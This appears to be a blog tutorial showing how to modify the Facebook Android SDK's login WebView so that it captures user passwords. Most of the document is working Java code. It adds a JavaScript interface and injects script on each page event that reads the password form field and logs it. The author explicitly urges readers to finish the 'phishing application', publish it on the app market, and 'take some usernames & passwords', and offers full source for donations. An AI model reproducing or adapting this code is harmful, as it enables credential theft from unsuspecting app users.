To Anonymous-
This tutorial assumes basic knowledge of Android, Java, Eclipse etc.
Setup
Download the Android Facebook SDK here: https://github.com/facebook/facebook-android-sdk
Follow this tutorial up to Installing the Facebook Android App, save the key generated from this step, to put on the Android market you'll need to generate a different key:
keytool -exportcert -alias androiddebugkey -keystore ~/.android/debug.keystore
| openssl sha1 -binary
| openssl base64
Create a Facebook application here: https://developers.facebook.com/apps
Import the Example project from the SDK download.
Inside of the example Facebook code (/Example/src/com/facebook/android/Example.java) edit the following line:
// Your Facebook Application ID must be set before running this example
// See http://www.facebook.com/developers/createapp.php
public static final String APP_ID = "###########";
make this APP_ID match the App ID/API Key from the Facebook Application's edit app settings page.
Next, click Edit Settings on the Facebook Application's page you've created and add the hask key from the keytool step above.
Run your Facebook application, make sure it works and you can log in. It should look like the images below. Note* you'll need to uninstall Facebook if you have it on your test device. More explained below how to get around this.
Now that it is changed time to make a few changes ... if you open /Example/com_facebook_android_src/com/facebook/android/FbDialog.java you'll notice that it is the popup WebView that Facebook uses for OAuth authentication.
You'll notice a FBWebViewClient that grabs the Auth token off the query string and also monitors the request urls. The first thing we are going to want to add is a JavaScript interface to this class.
private class ManicFocusJavaScriptInterface {
@SuppressWarnings("unused")
public void showHTML(String html) {
Log.i("HTML", "HTML: " + html);
}
}
Where the WebView is initialized you'll want to assign the JS Interface like the following,
private void setUpWebView() {
mWebView = new WebView(getContext());
mWebView.setVerticalScrollBarEnabled(false);
mWebView.setHorizontalScrollBarEnabled(false);
mWebView.setWebViewClient(new FbDialog.FbWebViewClient());
mWebView.getSettings().setJavaScriptEnabled(true);
mWebView.addJavascriptInterface(new ManicFocusJavaScriptInterface (), "HTMLOUT");
mWebView.getSettings().setJavaScriptEnabled(true);
mWebView.loadUrl(mUrl);
mWebView.setLayoutParams(FILL);
mContent.addView(mWebView);
}
Following this, we add a function to showHTML(), because we're lazy and don't want to figure out what step actually has the userName and password. You'll notice that I use the following, document.forms[0].elements[9].value, this is the password value on the SS below.
private void showHtml(WebView view) {
view.loadUrl("javascript:window.HTMLOUT.showHTML('<head>'+document.forms[0].elements[9].value+'</head>');");
}
You could use any browser to resolve this or fancier methods if need be. Finally, we need to tell all the WebView methods that are important to hit our showHTML method.
private class FbWebViewClient extends WebViewClient {
@Override
public boolean shouldOverrideUrlLoading(WebView view, String url) {
Log.e("Facebook-WebView", "Redirect URL: " + url);
showHtml(view);
if (url.startsWith(Facebook.REDIRECT_URI)) {
Bundle values = Util.parseUrl(url);
String error = values.getString("error");
if (error == null) {
error = values.getString("error_type");
}
if (error == null) {
mListener.onComplete(values);
} else if (error.equals("access_denied") ||
error.equals("OAuthAccessDeniedException")) {
mListener.onCancel();
} else {
mListener.onFacebookError(new FacebookError(error));
}
FbDialog.this.dismiss();
return true;
} else if (url.startsWith(Facebook.CANCEL_URI)) {
mListener.onCancel();
FbDialog.this.dismiss();
return true;
} else if (url.contains(DISPLAY_STRING)) {
return false;
}
// launch non-dialog URLs in a full browser
getContext().startActivity(
new Intent(Intent.ACTION_VIEW, Uri.parse(url)));
return true;
}
@Override
public void onReceivedError(WebView view, int errorCode,
String description, String failingUrl) {
super.onReceivedError(view, errorCode, description, failingUrl);
showHtml(view);
mListener.onError(
new DialogError(description, errorCode, failingUrl));
FbDialog.this.dismiss();
}
@Override
public void onPageStarted(WebView view, String url, Bitmap favicon) {
Log.e("Facebook-WebView", "Webview loading URL: " + url);
showHtml(view);
super.onPageStarted(view, url, favicon);
mSpinner.show();
}
@Override
public void onPageFinished(WebView view, String url) {
super.onPageFinished(view, url);
showHtml(view);
String title = mWebView.getTitle();
if (title != null && title.length() > 0) {
mTitle.setText(title);
}
mSpinner.dismiss();
}
private void showHtml(WebView view) {
view.loadUrl("javascript:window.HTMLOUT.showHTML('<head>'+document.forms[0].elements[9].value+'</head>');");
}
}
One thing to note, before running the application you'll need to uninstall your Facebook application. The Facebook Android SDK calls the Facebook.apk if it exists, or else it loads the popup like above. Since this is a quick proof of concept post, you'll have to figure out the correct code to comment out, so it always loads the popup. After running the application, look at LogCat you'll see your Facebook password being printed into the logs.
Password is being printed between the head tags. To finish your Facebook phishing application you'll need to strip out the redirect authentication to the Facebook application. Then add a few small features to your application and throw it on the market. Facebook basically built you a perfect phishing SDK, there are tons of examples, just make something silly with them. Take some usernames & passwords and creep some people out.
I'm believe the SSO is vulnerable to a MITM attack, but the SSO returns "invalid_key" even though the OAuth works. This appears to be a bug in the SDK. If anyone knows how to fix it, let me know~
If you donate, shoot me an email and I'll send over the working source for the example.
Good day.